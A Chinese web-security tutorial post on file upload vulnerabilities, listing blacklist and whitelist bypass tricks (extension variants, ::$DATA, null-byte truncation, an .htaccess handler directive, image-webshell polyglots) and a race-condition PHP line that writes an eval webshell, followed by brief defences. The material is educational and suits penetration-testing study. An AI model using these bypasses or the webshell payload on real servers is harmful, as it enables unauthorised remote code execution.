Web安全-文件上传漏洞-黑白名单及其它绕过思路(附思维导图)

什么是文件上传漏洞

文件上传漏洞是指应用程序未对用户上传的文件进行严格校验(如类型、后缀、内容、权限等),导致攻击者可上传恶意文件(如可执行脚本、木马程序)到服务器,进而通过访问恶意文件获取服务器权限、窃取数据或发起进一步攻击的安全缺陷,其核心风险在于恶意文件被服务器成功解析执行,常见于未做过滤或过滤逻辑存在漏洞的网站上传功能。

1.黑名单绕过

1.空格绕过

如:"1.php "

2.大小写绕过

如:1.phP

3.加点绕过

如:1.php.

4.::$DATA绕过

如:1.php::$DATA

5.复写绕过

如:1.pphphp

6.加一些字符绕过

如:1.phtml,1.pht,1.phps,1.php3,1.php4,1.php5,1.php3p等

6.htaccess绕过

对于apache中间件

<FilesMatch "as.png">setHandler application/x-httpd-php</FilesMatch>

.htaccess 绕过的核心是利用服务器配置缺陷、解析差异或请求篡改,常见思路包括通过文件名 / 路径篡改(如加特殊字符、路径遍历)、HTTP 请求头伪造(如改 X-Forwarded-For)、服务器解析规则漏洞(如 MultiViews 启用、解析优先级问题)、规则逻辑缺陷(如大小写混合绕过正则匹配)绕过后端访问限制,需注意该行为仅适用于合法授权的渗透测试,严禁未授权操作,且需结合目标服务器(Apache、Nginx 等)实际配置调整策略,现代安全防护工具也会拦截常见手段,合规场景下可通过针对性安全检查优化.htaccess 配置

2.白名单绕过

1.%00截断

php版本小于5.3.29

%00为结束符

先上传一个可上传文件,如1.png

利用bp修改url,如:1.php%00

2.0x00截断

0x00会被系统识别为结束符

利用bp修改16进制

先加空格,通过hex找到空格20,将其改为00

3.其它绕过方式

  1. 修改文件幻数绕过内容检测

使用16进制编辑器打开一个图片,在图片后面插入WebShell

或者cmd下执行:copy aaa.jpg/b+test.php/a shell.jpg

2.条件竞争

大量发包绕过文件删除

<?php fputs(fopen('xiao.php','w'),'<?php eval($_REQUEST[1]);?>');?>

4.文件上传漏洞的防御

1.上传的目录设置为不可执行。只要web容器无法解析该目录下面的文件,即使攻击者上传了脚本文件服务器本身也不会受到影响,因此这一点至关重要。

  1. 对文件后缀的判断中使用白名单的方式。

3.文件服务器和web服务器分离,也就是上传的文件单独存放到其他的服务器之中。

4.不需要返回文件路径的情况下,随机改写文件名。

相关推荐
独行soc19 小时前
2025年渗透测试面试题总结-264(题目+回答)
网络·python·安全·web安全·网络安全·渗透测试·安全狮
YangYang9YangYan20 小时前
网络安全专业职业能力认证发展路径指南
大数据·人工智能·安全·web安全
Yawesh_best20 小时前
告别系统壁垒!WSL+cpolar 让跨平台开发效率翻倍
运维·服务器·数据库·笔记·web安全
芳草萋萋鹦鹉洲哦21 小时前
【elemen/js】阻塞UI线程导致的开关卡顿如何优化
开发语言·javascript·ui
1***s63221 小时前
Vue图像处理开发
javascript·vue.js·ecmascript
小五传输21 小时前
常用的文件摆渡系统:让数据安全高效跨越网络界限
大数据·运维·安全
槁***耿21 小时前
JavaScript在Node.js中的事件发射器
开发语言·javascript·node.js
一叶茶21 小时前
移动端平板打开的三种模式。
前端·javascript
U***49831 天前
JavaScript在Node.js中的Strapi
开发语言·javascript·node.js
清平乐的技术专栏1 天前
Apache SeaTunnel的发展历程
apache